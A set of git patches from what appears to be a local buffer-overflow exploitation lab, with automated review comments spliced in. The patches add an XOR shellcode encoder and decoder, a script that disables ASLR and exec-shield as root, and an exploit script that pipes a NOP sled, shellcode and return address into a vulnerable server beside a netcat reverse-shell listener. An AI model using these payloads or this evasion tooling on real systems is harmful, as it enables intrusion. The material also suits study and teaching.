From 2b537a4601ae623346d70090455e487047e90a70 Mon Sep 17 00:00:00 2001
From: toni
Date: Sun, 1 Mar 2015 14:28:51 +0100
Subject: - fixed wrong target subst
---
Makefile | 34 ++++++++--------------------------
1 file changed, 8 insertions(+), 26 deletions(-)
diff --git a/Makefile b/Makefile
index 7ae222c..dbb5a92 100644
--- a/Makefile
+++ b/Makefile
@@ -9,11 +9,11 @@ OCFLAGS = -z execstack -fno-stack-protector
 X86_FLAGS = -m32 -mpreferred-stack-boundary=2
 X64_FLAGS = -m64 -mpreferred-stack-boundary=4
 SOURCES = $(wildcard *.c)
-TARGETS = $(patsubst %.c,%.o,$(SOURCES))
+TARGETS = $(patsubst %.c,%,$(SOURCES))
-all: $(SOURCES) $(TARGETS) shellcode crypter post-build
+all: $(TARGETS) shellcode crypter
-main: $(SOURCES) $(TARGETS)
+main: $(TARGETS)
 shellcode:
 $(MAKE) -C shellcode all
@@ -21,33 +21,15 @@ shellcode:
 crypter:
 $(MAKE) -C crypter all
-post-build:
- @read -p "disable protection stuff? (y/N) " answ; \
- if [ "x$$answ" != "xy" ]; then \
- echo "abort .."; \
- return 0; \
- else \
- ./disable_prot.sh; \
- fi
-
-disable-prot:
- if [ `cat /proc/sys/kernel/randomize_va_space` -eq 0 ]; then \
- echo "not necessary to run ./disable_prot.sh"; \
- else \
- ./disable_prot.sh; \
- fi
-
-%.o : %.c
- $(CC) $(CFLAGS) $(X86_FLAGS) $(OCFLAGS) -o $(patsubst %.o,%,$@) $<
+% : %.c
+ $(CC) $(CFLAGS) $(X86_FLAGS) $(OCFLAGS) -o $@ $<
 ifeq ($(LBITS),64)
- -$(CC) $(CFLAGS) $(X64_FLAGS) $(OCFLAGS) -o $(patsubst %.o,%,$@)_x64 $<
+ -$(CC) $(CFLAGS) $(X64_FLAGS) $(OCFLAGS) -o $@_x64 $<
 endif
- ln -s $< $@
 clean:
- $(RM) -f $(patsubst %.o,%,$(TARGETS)) $(patsubst %.c,%_x64,$(wildcard *.c))
- $(RM) -f $(TARGETS)
+ $(RM) -f $(TARGETS) $(patsubst %,%_x64,$(TARGETS))
 $(MAKE) -C crypter clean
 $(MAKE) -C shellcode clean
-.PHONY: shellcode crypter clean
+.PHONY: all main shellcode crypter clean
-- cgit v1.2.3
From 1bfe1303d5cc2bfb2d925f00d7d18a5950c2f4ec Mon Sep 17 00:00:00 2001
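Review bot: In the new `% : %.c` rule the 64-bit binary `$@_x64` is produced as a side effect of building `$@`, and the `-` prefix on that `$(CC)` line silently ignores a failed compile, so make can report `$@` up to date while `$@_x64` is missing or stale. A separate pattern rule, `%_x64 : %.c` with the recipe `$(CC) $(CFLAGS) $(X64_FLAGS) $(OCFLAGS) -o $@ $<`, listed among the `all`/`main` prerequisites under `ifeq ($(LBITS),64)`, gives each binary its own target and timestamp and lets a real compile error stop the build. In `clean`, `$(patsubst %,%_x64,$(TARGETS))` reads more directly as `$(addsuffix _x64,$(TARGETS))`. The first hunk's `TARGETS = $(patsubst %.c,%,$(SOURCES))` could use `:=` so the wildcard-derived list is computed once rather than on every reference.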
From: toni
Date: Sun, 1 Mar 2015 14:29:57 +0100
Subject: - readlink should do the trick
---
disable_prot.sh | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/disable_prot.sh b/disable_prot.sh
index 15e8137..54cc3be 100755
--- a/disable_prot.sh
+++ b/disable_prot.sh
@@ -1,9 +1,9 @@
 #!/bin/bash
 if [ `id -u` -ne 0 ]; then
- echo "$0: This program should be run as root"
+ echo "$0: This script should be run as root"
 echo "$0: Try to get root .."
- su -l root -c "$(realpath $0)"
+ su -l root -c "$(readlink -f $0)"
 exit $?
 fi
-- cgit v1.2.3
From 4ba94d8232cdb61b8e07c4a80197d9f704620ffb Mon Sep 17 00:00:00 2001
From: toni
Date: Wed, 4 Mar 2015 10:00:07 +0100
Subject: - added PAE check
---
disable_prot.sh | 9 ++++++++-
1 file changed, 8 insertions(+), 1 deletion(-)
diff --git a/disable_prot.sh b/disable_prot.sh
index 54cc3be..dba1bc0 100755
--- a/disable_prot.sh
+++ b/disable_prot.sh
@@ -1,12 +1,19 @@
 #!/bin/bash
 if [ `id -u` -ne 0 ]; then
- echo "$0: This script should be run as root"
+ echo "$0: This script should be run as root."
 echo "$0: Try to get root .."
 su -l root -c "$(readlink -f $0)"
 exit $?
 fi
+cat /proc/cpuinfo | grep -oq pae 2>/dev/null >/dev/null
+ret=$?
+if [ $ret -eq 0 ]; then
+ echo "$0: PAE enabled system found."
+ echo "$0: Some exploits will not work!"
+fi
+
 sysctl -w kernel.randomize_va_space=0 2>/dev/null
 sysctl -w kernel.exec-shield=0 2>/dev/null
 echo "done."
-- cgit v1.2.3
From 15fbdd7e155e5181de6a82c34e419488bc9626d0 Mon Sep 17 00:00:00 2001
From: toni
Date: Wed, 4 Mar 2015 18:59:52 +0100
Subject: - Makefile: new target 'debug'
---
Makefile | 7 +++++--
crypter/Makefile | 7 ++++---
2 files changed, 9 insertions(+), 5 deletions(-)
diff --git a/Makefile b/Makefile
index dbb5a92..145ddf4 100644
--- a/Makefile
+++ b/Makefile
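Review bot: `$0` is unquoted inside the command substitution on the new `su -l root -c "$(readlink -f $0)"` line, so a script path containing whitespace is word-split before `readlink` sees it; write `su -l root -c "$(readlink -f "$0")"`. The outer double quotes still hand `su` a single argument, so nothing else about the re-exec changes.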
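Review bot: The new PAE check pipes `cat` into `grep -oq` and then tests `ret=$?` on a separate line; `-o` has no effect combined with `-q`, both redirections are redundant with `-q`, and the intermediate variable exists only to feed the `if`. The block collapses to `if grep -qw pae /proc/cpuinfo; then`, where `-w` restricts the match to the whole `pae` flag token. The check is only a notice and the two `sysctl -w` lines below it still run unconditionally; if that is intended, a comment on the `+if` line saying so would stop a reader from expecting an early exit.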
@@ -4,8 +4,8 @@ RM := rm
 CC := gcc
 STRIP := strip
 LBITS := $(shell getconf LONG_BIT)
-CFLAGS = -Wall -g
-OCFLAGS = -z execstack -fno-stack-protector
+CFLAGS += -Wall
+OCFLAGS += -z execstack -fno-stack-protector
 X86_FLAGS = -m32 -mpreferred-stack-boundary=2
 X64_FLAGS = -m64 -mpreferred-stack-boundary=4
 SOURCES = $(wildcard *.c)
@@ -15,6 +15,9 @@ all: $(TARGETS) shellcode crypter
 main: $(TARGETS)
+debug:
+ $(MAKE) -C . CFLAGS="-g"
+
 shellcode:
 $(MAKE) -C shellcode all
diff --git a/crypter/Makefile b/crypter/Makefile
index f64183f..db2b296 100644
--- a/crypter/Makefile
+++ b/crypter/Makefile
@@ -4,7 +4,7 @@ CC := gcc
 LD := ld
 XXD := xxd
 ASMFLAGS = -g
-CFLAGS ?= -Wall -fpic -Os
+CFLAGS += -fpic -Os
 X86_FLAGS := -m32
 X64_FLAGS := -m64
 LDFLAGS ?=
@@ -27,8 +27,8 @@ ifneq ($(SCC),yes)
 $(error Please run 'make' first in the main directory)
 endif
 @echo "generating header $(patsubst %.c,%.h,$<) for target $<"
- -$(shell $(SCDIR)/sc-test -p $(SUBDIR)/`cat "$<" | sed -n 's/.*#DECODER=//p'` | sed 's/shellcode/decoder/' > $(patsubst %.o,%.h,$@))
- -$(shell $(SCDIR)/sc-test -p $(SUBDIR)/`cat "$<" | sed -n 's/.*#SHELLCODE=//p'` >> $(patsubst %.o,%.h,$@))
+ -$(shell $(SCDIR)/sc-test -p $(SUBDIR)/`cat "$<" | sed -n 's/.*#DECODER=//p'` | sed 's/shellcode/decoder/' > $(patsubst %.c,%.h,$<))
+ -$(shell $(SCDIR)/sc-test -p $(SUBDIR)/`cat "$<" | sed -n 's/.*#SHELLCODE=//p'` >> $(patsubst %.c,%.h,$<))
 $(CC) $(CFLAGS) $(X86_FLAGS) -D_USE_CFG -o $(patsubst %.c,%,$<) $<
 ifeq ($(LBITS),64)
 $(CC) $(CFLAGS) $(X64_FLAGS) -D_USE_CFG -o $(patsubst %.c,%_x64,$<) $<
@@ -36,6 +36,7 @@ endif
 clean:
 $(RM) -f $(patsubst %.c,%,$(SOURCES_C)) $(patsubst %.c,%_x64,$(SOURCES_C))
+ $(RM) -f $(patsubst %.c,%.h,$(SOURCES_C))
 $(RM) -f $(patsubst %.asm,%.o,$(SOURCES_ASM))
 .PHONY: all clean
-- cgit v1.2.3
From 38a95058a7f521e465f5977bcbbdac1a74b30f31 Mon Sep 17 00:00:00 2001
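Review bot: `debug` runs `$(MAKE) -C . CFLAGS="-g"`, and a command-line assignment overrides every `CFLAGS +=` inside the makefile, so the `CFLAGS += -Wall` added in the first hunk is dropped for exactly the debug build; use `override CFLAGS += -Wall`, or keep required flags out of the user knob with something like `ALL_CFLAGS := -Wall $(CFLAGS)`. The same applies to `CFLAGS += -fpic -Os` in crypter/Makefile, where the switch from `?=` also silently drops the previous `-Wall`. `debug` is a command rather than a file and is missing from the `.PHONY` list, which this commit does not touch, so a file named `debug` in the top directory would make the target look up to date.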
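Review bot: The two `-$(shell …)` lines are expanded by make before the recipe line reaches the shell, so `sc-test` runs during recipe expansion, its exit status is never observed, and the `-` prefix only applies to the empty command that is left; a missing or failing `sc-test` leaves a truncated header and the build carries on. Writing them as ordinary recipe commands, e.g. `$(SCDIR)/sc-test -p $(SUBDIR)/$$(sed -n 's/.*#DECODER=//p' "$<") | sed 's/shellcode/decoder/' > $(patsubst %.c,%.h,$<)` (and `>>` for the second), lets make stop on failure and drops the useless `cat`. The generated `%.h` is also a side product of whatever rule this recipe belongs to rather than a target of its own, which is why the `clean` hunk below has to list it explicitly. The enclosing rule's header is above the hunk.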
From: toni
Date: Wed, 4 Mar 2015 19:00:25 +0100
Subject: - xor2_decoder wip - exploit_tcp: screen uses null cfg file
---
crypter/xor2_decoder.asm | 63 ++++++++++++++++++-----
crypter/xor2_encoder.c | 129 ++++++++++++++++++++++++++++++-----------------
exploit_tcp.sh | 3 +-
3 files changed, 136 insertions(+), 59 deletions(-)
diff --git a/crypter/xor2_decoder.asm b/crypter/xor2_decoder.asm
index cc102b2..93bdedf 100644
--- a/crypter/xor2_decoder.asm
+++ b/crypter/xor2_decoder.asm
@@ -1,22 +1,61 @@
 BITS 32
+; plain x86 | trailer
+; ---------------------------------------------------------------------------------------------
+; | decoder | 2 byte shellcode len | 1 byte xor key len | xor key (xor key len) | shellcode |
+; ----------------[XOR ENCODED]--------------------------------------------------[XOR ENCODED]-
+; | Reg: cx | Reg: dl | [esi]+3+dh | [esi]+3+dl+ebx
+
 jmp short go
 next:
-pop esi ; stackpointer -> start+len(encoder)
-xor ecx,ecx ; zero out some regs
-xor eax,eax
+pop esi ; get stackpointer := start+sizeof(decoder)
+
+xor ecx,ecx
+mov word cx,[esi] ; shellcode len (encoded)
+xor word cx,0x0101 ; decode shellcode len
+
+; dh := xor pad
+; dl := xor key len
 xor edx,edx
-mov cl,0 ; buffer length
-mov dl,4 ; xor padding
+mov byte dl,[esi+2]
+
+xor ebx,ebx ; zero out
 change:
-xor byte [esi + ecx],0
-mov byte al,[esi + ecx]
-dec cl
-jnz done ; no more bytes left
-dec dh
-jnz change
-mov dh,dl
+; calc memory location
+mov eax,esi
+push dword eax
+add dword [esp],0x3 ; shellcode len (2 bytes) + xor key len (1 byte)
+movzx eax,dl
+add [esp],eax
+add [esp],ebx
+pop dword eax ; eax holds the pointer to our next encoded byte
+
+mov edi,eax
+
+mov eax,esi ; <----- DBG
+push dword eax
+add dword [esp],0x3 ; see above
+movzx eax,dh
+add [esp],eax
+pop dword eax ; al holds the xor 1-byte-pad
+; TODO: not rly efficient, change it!
+push dword esi ; save our trailer pointer
+mov esi,[eax]
+xor eax,eax
+mov byte al,esi
+pop dword esi ; get our trailer pointer
+
+xor byte [edi],al
+
+inc ebx
+cmp ebx,ecx
+je done ; no more bytes left
+
+inc dh ; next xor 1-byte-pad
+cmp dh,dl ; check if xor pad == xor len
+jne change
+xor byte dh,dh
 jmp change
 done:
diff --git a/crypter/xor2_encoder.c b/crypter/xor2_encoder.c
index cc46592..fc3f904 100644
--- a/crypter/xor2_encoder.c
+++ b/crypter/xor2_encoder.c
@@ -1,4 +1,4 @@
-// #DECODER=./xor_decoder.o
+// #DECODER=./xor2_decoder.o
 // #SHELLCODE=../shellcode/hello.o
 #define _GNU_SOURCE 1
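Review bot: `mov byte al,esi` on the new side pairs an 8-bit destination with a 32-bit source register, which NASM rejects, so the decoder as committed cannot be assembled; together with the second pointer computation marked `; <----- DBG` and the `; TODO` above it, this is the scaffolding the `wip` in the subject refers to, and a comment on that line saying it is known-broken would save the next reader a failed build. The layout table at the top is the only statement of which register holds what; a comment at `next:` restating it in words (cx = decoded shellcode length, dl = key length, dh = key index, ebx = byte index) would make the loop readable without scrolling back to the table. The file continues past `done:` outside the hunk.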
@@ -6,7 +6,10 @@
 #include
 #include
 #include
+#include
 #include
+#include
+#include
 #ifdef _USE_CFG
 #include "xor2_encoder.h"
@@ -14,17 +17,17 @@
 #error "xor2_encoder.h config file missing including decoder && shellcode"
 #endif
-#ifndef _CRYPTVAL
-#define _CRYPTVAL 0xff
-#endif
+#define XOR_KEYLEN 5
+#define SCLEN_XORKEY 0x0101
+#define TRAILER 3
 #ifndef _OUTFILE
 #define _OUTFILE "xor2_encoded.o"
 #endif
-int
-getnumber(int n)
+long int
+getnumber(long int n)
 {
 int seed;
 struct timeval tm;
@@ -36,11 +39,11 @@ getnumber(int n)
 }
 void
-print_code(const char *name, char *data, int len)
+print_code(const char *name, char *data, size_t len)
 {
 int i,l = 15;
- printf("unsigned long int l%s = %lu;\nchar %s[] = \n", name, (unsigned long int) strlen(data), name);
+ printf("unsigned long int l%s = %lu;\nchar %s[] = \n", name, (unsigned long int) len, name);
 for (i = 0; i < len; i++) {
 if (l >= 15) {
 if (i) {
@@ -55,6 +58,52 @@ print_code(const char *name, char *data, int len)
 printf("\";\n\n");
 }
+long int
+eof_check(char *data, size_t len)
+{
+ long int i;
+
+ for (i = 0; i < len; i++) {
+ if ( *(char *)(data + i) == '\0' ) {
+ return i;
+ }
+ }
+ return -1;
+}
+
+char *
+xor_genkey(size_t keylen)
+{
+ char *key;
+ long int kd, rnd;
+ int i = 0;
+
+ key = calloc(sizeof(char), keylen);
+ while (i+sizeof(long int) < keylen) {
+ rnd = getnumber(LONG_MAX);
+ memcpy(&key[i], &rnd, sizeof(long int));
+ i += sizeof(long int);
+ }
+ kd = keylen - i;
+ if ( kd != 0 ) {
+ rnd = getnumber(LONG_MAX);
+ memcpy(&key[i], &rnd, kd);
+ }
+ return key;
+}
+
+void
+xor_encrypt(char *buf, size_t buflen, char *key, size_t keylen)
+{
+ int i;
+ unsigned char xb;
+
+ for (i = 0; i < buflen; i++) {
+ xb = key[i % keylen];
+ buf[i] ^= xb;
+ }
+}
+
 void
 err_n_xit(const char *exit_msg, const char *arg)
 {
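Review bot: The new helpers mix signed counters with `size_t` bounds — `long int i` against `len` in `eof_check`, `int i` against `buflen` in `xor_encrypt`, and `int i` against `keylen` in `xor_genkey`'s `while (i+sizeof(long int) < keylen)` — which draws sign-compare warnings under the `-Wall` the project sets and, for the `int` counters, misbehaves for lengths above `INT_MAX`; use `size_t i` in all three loops and convert to `long` only where `eof_check` returns its index. `xor_genkey` also has `calloc`'s argument order swapped (`calloc(sizeof(char), keylen)` is `nmemb, size`, harmless here) and never checks for a NULL return before the `memcpy` calls. A short header comment on `xor_genkey` should state that the returned buffer is heap-allocated and owned by the caller, and that the bytes come from `getnumber`, whose visible locals (`int seed; struct timeval tm;`) suggest a time-seeded generator — adequate for this obfuscation step, but not something a caller should treat as a cryptographic key.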
@@ -74,66 +123,54 @@ err_n_xit(const char *exit_msg, const char *arg)
 int
 main(int argc, char **argv)
 {
- int i, npos = 0, number = getnumber(_CRYPTVAL), nullbyte = 0;
+ int nullbyte = 0;
+ long int nb_idx;
 int ldecoder = sizeof(decoder)-1; /* last byte is '\x00' */
- int lshellcode = sizeof(shellcode)-1; /* same as above */
- int first_arg = 1;
- char *result;
+ uint16_t lshellcode = (uint16_t) sizeof(shellcode)-1; /* same as above */
+ char *result, *mod_decoder, *xor_key;
 FILE *outfile;
- printf("/* Using value %d to encode the shellcode. */\n", number);
 printf("/* PRINT SHELLCODE */\n");
 print_code("shellcode", shellcode, lshellcode);
 printf("/* PRINT DECODER */\n");
 print_code("decoder", decoder, ldecoder);
- for (i = 0; i < ldecoder; i++) {
- if (decoder[i] == '\x00') {
- if (first_arg) {
- decoder[i] = lshellcode;
- first_arg =0;
- } else {
- decoder[i] = (unsigned char) number;
- npos = i;
- }
- printf("// decoder[%d] = %u (%02x)\n", i, (unsigned char) decoder[i], (unsigned char) decoder[i]);
- }
+ mod_decoder = malloc(ldecoder + TRAILER); // buffer size (2 bytes) + xor key len (1 byte)
+ memcpy(mod_decoder, decoder, ldecoder);
+ *(uint16_t *) (&mod_decoder[ldecoder]) = (uint16_t) (lshellcode ^ SCLEN_XORKEY);
+ *(uint8_t *) (&mod_decoder[ldecoder+2]) = (uint8_t) XOR_KEYLEN;
+ printf("/* shellcode length: decoder[%u] = %u bytes ^ 0x%04x = 0x%04x */\n", lshellcode, mod_decoder[ldecoder], SCLEN_XORKEY, *(uint16_t *) &mod_decoder[ldecoder]);
+ printf("/* xor key length: decoder[%u] = %u bytes = 0x%02x */\n", ldecoder+2, mod_decoder[ldecoder+2], mod_decoder[ldecoder+2]);
+
+ if ( (nb_idx = eof_check(mod_decoder , ldecoder+3)) != -1) {
+ printf("NULLBYTE DETECTED: decoder+0x%04x (%lu)\n", (unsigned int) nb_idx, nb_idx);
+ exit(-1);
 }
- printf("\n");
- result = malloc(lshellcode);
+ result = calloc(ldecoder + lshellcode + TRAILER + XOR_KEYLEN, sizeof(char));
+ printf("/* total length = %d */\n", ldecoder + lshellcode + TRAILER + XOR_KEYLEN);
+ memcpy(result,
mod_decoder, ldecoder + TRAILER);
+ free(mod_decoder);
 do {
- memcpy(result, shellcode, lshellcode);
+ xor_key = xor_genkey(XOR_KEYLEN);
+ memcpy(result + ldecoder + TRAILER, xor_key, XOR_KEYLEN);
+ memcpy(result + ldecoder + TRAILER + XOR_KEYLEN, shellcode, lshellcode);
+ xor_encrypt(result + ldecoder + TRAILER + XOR_KEYLEN, lshellcode, xor_key, XOR_KEYLEN);
+ print_code("xor", xor_key, XOR_KEYLEN);
 if (nullbyte == 1) {
- number = getnumber(_CRYPTVAL);
- fprintf(stderr, "New crypt value: %d (%02x)\n", number, number);
- decoder[npos] = number;
 nullbyte = 0;
 }
- for (i = 0; i < lshellcode; i++) {
- result[i] ^= number;
- if (result[i] == '\x00') {
- nullbyte = 1;
- fprintf(stderr, "Recode!\n");
- break;
- }
- }
+ free(xor_key);
 } while (nullbyte == 1);
- memcpy(shellcode, result, lshellcode);
- free(result);
- result = malloc(ldecoder + lshellcode + 1);
- memcpy(result, (const void *) decoder, ldecoder);
- memcpy(result + ldecoder, shellcode, lshellcode);
- *(result + ldecoder + lshellcode) = '\0';
- print_code("result", result, ldecoder + lshellcode);
+ print_code("result", result, ldecoder + lshellcode + TRAILER + XOR_KEYLEN);
 /* write2file */
 outfile = fopen(_OUTFILE, "w+b");
 if (outfile == NULL) err_n_xit("fopen", _OUTFILE);
- if (fwrite((void *) result, sizeof(char), strlen(result), outfile) != strlen(result)) err_n_xit("fwrite", _OUTFILE);
+ if (fwrite((void *) result, sizeof(char), ldecoder + lshellcode + TRAILER + XOR_KEYLEN, outfile) != (ldecoder + lshellcode + TRAILER + XOR_KEYLEN)) err_n_xit("fwrite", _OUTFILE);
 if (fclose(outfile) != 0) err_n_xit("fclose", _OUTFILE);
 fprintf(stderr, "outfile: %s\n", _OUTFILE);
diff --git a/exploit_tcp.sh b/exploit_tcp.sh
index 106489d..aecfe2c 100755
--- a/exploit_tcp.sh
+++ b/exploit_tcp.sh
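Review bot: The first new `printf` in main labels its index with `lshellcode` (`decoder[%u]` is printed with the shellcode length) while the value shown is `mod_decoder[ldecoder]`; the next line correctly uses `ldecoder+2`, so this one should pass `ldecoder`. In the same stretch `mod_decoder[ldecoder]` is a `char` handed to `%u` (sign-extended where `char` is signed) and `nb_idx` is a `long` handed to `%lu`; cast the byte to `unsigned char` and use `%ld` for the index. Neither the `malloc(ldecoder + TRAILER)` nor the `calloc` for `result` is checked for NULL before the following `memcpy`, and `result` is never freed. Nothing in the rewritten loop sets `nullbyte` to 1 any more, so the `do { … } while (nullbyte == 1)` runs exactly once and the `if (nullbyte == 1)` branch is dead; either drop the loop or leave a comment saying the retry was deliberately removed. `main` continues past the end of the hunk.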
@@ -7,7 +7,7 @@
 # 79xNOP (0x90) + shellcode + 79xNOP (0x90) + return addr
 echo "starting netcat reverse tcp server .."
-screen -d -m -S overcat /bin/netcat -l -s 127.0.0.1 -p 4444
+screen -c /dev/null -d -m -S overcat /bin/netcat -l -s 127.0.0.1 -p 4444
 sleep 1
 echo "starting exploitable tcp server .."
 ./overflow_tcp &
@@ -25,5 +25,6 @@ python -c 'print "\x90"*79 + \
 "\x29\x3e\x5d\x96\xe6\xc9\x40\xa7\x02\x07\x02\xf9\xcf\xfd" + \
 "\x03\xa2\x22\x81" + \
 "\x90"*83 + "\x9d\xd4\xff\xff"' | nc -q 0 "$host" 3000
+read -p "[PRESS RETURN TO CONTINUE]"
 screen -R overcat
-- cgit v1.2.3